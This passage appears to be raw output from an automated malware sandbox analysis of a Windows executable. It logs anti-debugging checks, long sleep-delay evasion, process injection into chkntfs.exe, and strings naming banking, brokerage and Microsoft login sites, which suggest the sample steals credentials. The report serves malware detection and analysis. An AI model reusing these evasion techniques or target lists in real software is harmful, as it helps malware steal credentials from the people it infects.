              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: 8380000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: 8620000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: 9620000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory allocated: 8720000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory allocated: 9720000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory allocated: 98F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory allocated: A8F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E096E rdtsc 3_2_012E096E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 240000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 239874Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 239765Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 9823Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeWindow / User API: threadDelayed 912Jump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI coverage: 2.6 %
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe TID: 5896Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836Thread sleep count: 149 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836Thread sleep time: -298000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836Thread sleep count: 9823 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836Thread sleep time: -19646000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880Thread sleep time: -75000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880Thread sleep count: 39 > 30Jump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880Thread sleep time: -39000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880Thread sleep time: -46500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492Thread sleep time: -239874s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492Thread sleep time: -239765s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 2376Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 7716Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005ABE80 FindFirstFileW,FindNextFileW,FindClose,14_2_005ABE80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 240000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 239874Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 239765Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: j77tfG6.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: j77tfG6.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: j77tfG6.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: j77tfG6.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: j77tfG6.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: j77tfG6.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: AMC password management pageVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3709837557.00000000079D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: j77tfG6.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: j77tfG6.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: j77tfG6.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: j77tfG6.14.drBinary or memory string: discord.comVMware20,11696492231f
              Source: firefox.exe, 00000012.00000002.1724397618.000002B134CBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: j77tfG6.14.drBinary or memory string: global block list test formVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: j77tfG6.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: j77tfG6.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: j77tfG6.14.drBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: j77tfG6.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3704528727.000000000163F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
              Source: j77tfG6.14.drBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: j77tfG6.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: j77tfG6.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: j77tfG6.14.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: j77tfG6.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: j77tfG6.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: j77tfG6.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E096E rdtsc 3_2_012E096E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00417A13 LdrLoadDll,3_2_00417A13
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D0124 mov eax, dword ptr fs:[00000030h]3_2_012D0124
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01360115 mov eax, dword ptr fs:[00000030h]3_2_01360115
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134A118 mov ecx, dword ptr fs:[00000030h]3_2_0134A118
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134A118 mov eax, dword ptr fs:[00000030h]3_2_0134A118
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134A118 mov eax, dword ptr fs:[00000030h]3_2_0134A118
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134A118 mov eax, dword ptr fs:[00000030h]3_2_0134A118
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov eax, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov ecx, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov eax, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov eax, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov ecx, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov eax, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov eax, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov ecx, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov eax, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E10E mov ecx, dword ptr fs:[00000030h]3_2_0134E10E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374164 mov eax, dword ptr fs:[00000030h]3_2_01374164
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374164 mov eax, dword ptr fs:[00000030h]3_2_01374164
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01338158 mov eax, dword ptr fs:[00000030h]3_2_01338158
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01334144 mov eax, dword ptr fs:[00000030h]3_2_01334144
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01334144 mov eax, dword ptr fs:[00000030h]3_2_01334144
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01334144 mov ecx, dword ptr fs:[00000030h]3_2_01334144
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01334144 mov eax, dword ptr fs:[00000030h]3_2_01334144
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01334144 mov eax, dword ptr fs:[00000030h]3_2_01334144
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6154 mov eax, dword ptr fs:[00000030h]3_2_012A6154
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6154 mov eax, dword ptr fs:[00000030h]3_2_012A6154
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129C156 mov eax, dword ptr fs:[00000030h]3_2_0129C156
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E0185 mov eax, dword ptr fs:[00000030h]3_2_012E0185
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132019F mov eax, dword ptr fs:[00000030h]3_2_0132019F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132019F mov eax, dword ptr fs:[00000030h]3_2_0132019F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132019F mov eax, dword ptr fs:[00000030h]3_2_0132019F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132019F mov eax, dword ptr fs:[00000030h]3_2_0132019F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01344180 mov eax, dword ptr fs:[00000030h]3_2_01344180
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01344180 mov eax, dword ptr fs:[00000030h]3_2_01344180
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135C188 mov eax, dword ptr fs:[00000030h]3_2_0135C188
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135C188 mov eax, dword ptr fs:[00000030h]3_2_0135C188
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129A197 mov eax, dword ptr fs:[00000030h]3_2_0129A197
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129A197 mov eax, dword ptr fs:[00000030h]3_2_0129A197
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129A197 mov eax, dword ptr fs:[00000030h]3_2_0129A197
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013761E5 mov eax, dword ptr fs:[00000030h]3_2_013761E5
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D01F8 mov eax, dword ptr fs:[00000030h]3_2_012D01F8
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E1D0 mov eax, dword ptr fs:[00000030h]3_2_0131E1D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E1D0 mov eax, dword ptr fs:[00000030h]3_2_0131E1D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0131E1D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E1D0 mov eax, dword ptr fs:[00000030h]3_2_0131E1D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E1D0 mov eax, dword ptr fs:[00000030h]3_2_0131E1D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013661C3 mov eax, dword ptr fs:[00000030h]3_2_013661C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013661C3 mov eax, dword ptr fs:[00000030h]3_2_013661C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01336030 mov eax, dword ptr fs:[00000030h]3_2_01336030
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129A020 mov eax, dword ptr fs:[00000030h]3_2_0129A020
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129C020 mov eax, dword ptr fs:[00000030h]3_2_0129C020
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01324000 mov ecx, dword ptr fs:[00000030h]3_2_01324000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01342000 mov eax, dword ptr fs:[00000030h]3_2_01342000
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE016 mov eax, dword ptr fs:[00000030h]3_2_012BE016
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE016 mov eax, dword ptr fs:[00000030h]3_2_012BE016
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE016 mov eax, dword ptr fs:[00000030h]3_2_012BE016
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE016 mov eax, dword ptr fs:[00000030h]3_2_012BE016
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CC073 mov eax, dword ptr fs:[00000030h]3_2_012CC073
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326050 mov eax, dword ptr fs:[00000030h]3_2_01326050
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A2050 mov eax, dword ptr fs:[00000030h]3_2_012A2050
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012980A0 mov eax, dword ptr fs:[00000030h]3_2_012980A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013660B8 mov eax, dword ptr fs:[00000030h]3_2_013660B8
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013660B8 mov ecx, dword ptr fs:[00000030h]3_2_013660B8
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013380A8 mov eax, dword ptr fs:[00000030h]3_2_013380A8
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A208A mov eax, dword ptr fs:[00000030h]3_2_012A208A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A80E9 mov eax, dword ptr fs:[00000030h]3_2_012A80E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0129A0E3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013260E0 mov eax, dword ptr fs:[00000030h]3_2_013260E0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129C0F0 mov eax, dword ptr fs:[00000030h]3_2_0129C0F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E20F0 mov ecx, dword ptr fs:[00000030h]3_2_012E20F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013220DE mov eax, dword ptr fs:[00000030h]3_2_013220DE
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01378324 mov eax, dword ptr fs:[00000030h]3_2_01378324
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01378324 mov ecx, dword ptr fs:[00000030h]3_2_01378324
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01378324 mov eax, dword ptr fs:[00000030h]3_2_01378324
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01378324 mov eax, dword ptr fs:[00000030h]3_2_01378324
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA30B mov eax, dword ptr fs:[00000030h]3_2_012DA30B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA30B mov eax, dword ptr fs:[00000030h]3_2_012DA30B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA30B mov eax, dword ptr fs:[00000030h]3_2_012DA30B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129C310 mov ecx, dword ptr fs:[00000030h]3_2_0129C310
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C0310 mov ecx, dword ptr fs:[00000030h]3_2_012C0310
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134437C mov eax, dword ptr fs:[00000030h]3_2_0134437C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136A352 mov eax, dword ptr fs:[00000030h]3_2_0136A352
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01348350 mov ecx, dword ptr fs:[00000030h]3_2_01348350
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132035C mov eax, dword ptr fs:[00000030h]3_2_0132035C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132035C mov eax, dword ptr fs:[00000030h]3_2_0132035C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132035C mov eax, dword ptr fs:[00000030h]3_2_0132035C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132035C mov ecx, dword ptr fs:[00000030h]3_2_0132035C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132035C mov eax, dword ptr fs:[00000030h]3_2_0132035C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132035C mov eax, dword ptr fs:[00000030h]3_2_0132035C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0137634F mov eax, dword ptr fs:[00000030h]3_2_0137634F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01322349 mov eax, dword ptr fs:[00000030h]3_2_01322349
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E388 mov eax, dword ptr fs:[00000030h]3_2_0129E388
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E388 mov eax, dword ptr fs:[00000030h]3_2_0129E388
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E388 mov eax, dword ptr fs:[00000030h]3_2_0129E388
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C438F mov eax, dword ptr fs:[00000030h]3_2_012C438F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C438F mov eax, dword ptr fs:[00000030h]3_2_012C438F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01298397 mov eax, dword ptr fs:[00000030h]3_2_01298397
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01298397 mov eax, dword ptr fs:[00000030h]3_2_01298397
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01298397 mov eax, dword ptr fs:[00000030h]3_2_01298397
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B03E9 mov eax, dword ptr fs:[00000030h]3_2_012B03E9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D63FF mov eax, dword ptr fs:[00000030h]3_2_012D63FF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE3F0 mov eax, dword ptr fs:[00000030h]3_2_012BE3F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE3F0 mov eax, dword ptr fs:[00000030h]3_2_012BE3F0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE3F0 mov eax, dword ptr fs:[00000030h]3_2_012BE3F0
